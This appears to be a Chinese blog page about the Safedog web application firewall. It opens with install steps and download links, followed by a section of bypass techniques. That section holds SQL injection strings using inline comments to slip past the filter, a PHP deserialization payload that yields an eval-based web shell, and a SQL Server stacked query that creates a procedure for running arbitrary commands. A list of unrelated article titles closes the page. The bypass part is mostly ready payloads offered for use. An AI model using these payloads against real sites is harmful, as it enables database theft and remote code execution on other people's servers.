安装 - Linux

下载
http://download.safedog.cn/safedog_linux64.tar.gz
wget http://download.safedog.cn/safedog_linux64.tar.gz 解压
tar xvf safedog_linux64.tar 运行
./install.py 卸载
进入安装包解压目录
chmod +x uninstall.sh
./uninstall.sh

安装 - Windows

下载
http://down.safedog.cn/download/software/safedogfwqV5.0.exe

使用指南

https://www.safedog.cn/download/software/safedogfwq_Windows_Help.pdf

https://www.safedog.cn/download/software/safedogfwq_linux_Help.pdf

绕过

规则缺陷绕过 - 搜索框 + 字符型SQL注入 +  IIS + ASPX + /**a*/

aspx?Pro=广x' and 1=1 --     #检测
aspx?Pro=广x' /**a*/and 1=1 -- #绕过
#遍历
aspx?Pro=广x' /**a*/union /**a*/select 1,2,3,4,5 --   
aspx?Pro=广x' /**a*/and 1=(select 1) --

PHP反序列化绕过

<?php
class A{
public $name;
public $male;
function __destruct(){
$a = $this->name;
$a($this->male);
}
}
unserialize($_POST['un']);
?> POST - un=O::"A"::{s::"name";s::"assert";s::"male";s::"eval($_GET["x"])";} GET - x=phpinfo(); --结合Hackbar使用

存储过程 + SQLServer 绕过

?type=;EXEC/*(*/student..sp_sqlexec 'CREATE PROCEDURE myexec(@s VARCHAR(1024)) as exec(@s)'

最新文章

  1. JavaScript- jquery easyui 可编辑表格插件 easyui.editgrid
  2. AVL的删除写法的一个错误
  3. [Offer收割]编程练习赛3 - 题目3 : 智力竞赛
  4. 如何分析解读systemstat dump产生的trc文件
  5. 添加Distributor失败
  6. jQuery 焦点图 旋转木马
  7. HDU 4744 Starloop System(ZKW费用流)
  8. Cassandra1.2文档学习(15)—— 配置数据一致性
  9. about家庭智能设备部分硬件模块功能共享【协同工作】solution
  10. Node.js学习(10)----文件系统fs
  11. ida idc函数列表全集
  12. HTTP初步注解
  13. 前序 中序 后序 遍历 递归 非递归算法 java实现
  14. Codeforces 514 D R2D2 and Droid Army(RMQ+二分法)
  15. 使用原始XML资源——定义原始XML资源
  16. Theano环境搭建/安装
  17. python 批量删除mysql前缀相同的表
  18. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server versio
  19. mybatis中String参数的传递
  20. MySQL之SQL注入

热门文章

  1. nmblookup - 基于TCP/IP上的NetBIOS客户用于查询NetBIOS名字的程序
  2. 005-sort 命令使用
  3. MyBatis源码浅析
  4. mobilefacenet
  5. 35.ES6语法介绍——2019年12月24日
  6. 微信小程序-wxml-空格
  7. apicloud直接上传图片
  8. js返回上一页并刷新 代码整理
  9. Activiti组任务(十)
  10. CityMaker SDK与三维GIS城市